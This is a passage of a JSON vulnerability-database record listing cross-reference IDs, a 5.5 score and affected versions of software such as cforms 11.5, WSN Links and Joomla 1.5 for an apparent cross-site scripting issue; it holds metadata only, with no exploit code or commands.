"SSV:20225"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:95395", "PACKETSTORM:95353"]}, {"type": "exploitdb", "idList": ["EDB-ID:15607", "EDB-ID:34946"]}, {"type": "jvn", "idList": ["JVN:35256978"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310801628"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:8CE453E5-6EAC-4991-BFAF-260D34E0A71B"]}, {"type": "nessus", "idList": ["CFORMS_RS_XSS.NASL"]}], "modified": "2021-06-08T19:01:00", "rev": 2}, "score": {"value": 5.5, "vector": "NONE", "modified": "2021-06-08T19:01:00", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [{"name": "webmedia explorer", "operator": "eq", "version": "6.13"}, {"name": "cforms", "operator": "eq", "version": "11.5"}, {"name": "wsn links", "operator": "eq", "version": "5.1"}, {"name": "wsn links", "operator": "eq", "version": "6.0"}, {"name": "joomla", "operator": "eq", "version": "1.5"}, {"name": "wsn links", "operator": "eq", "version": "5.0"}, {"name": "memht portal", "operator": "eq", "version": "4.0"}], "immutableFields": [], "scheme": null}]}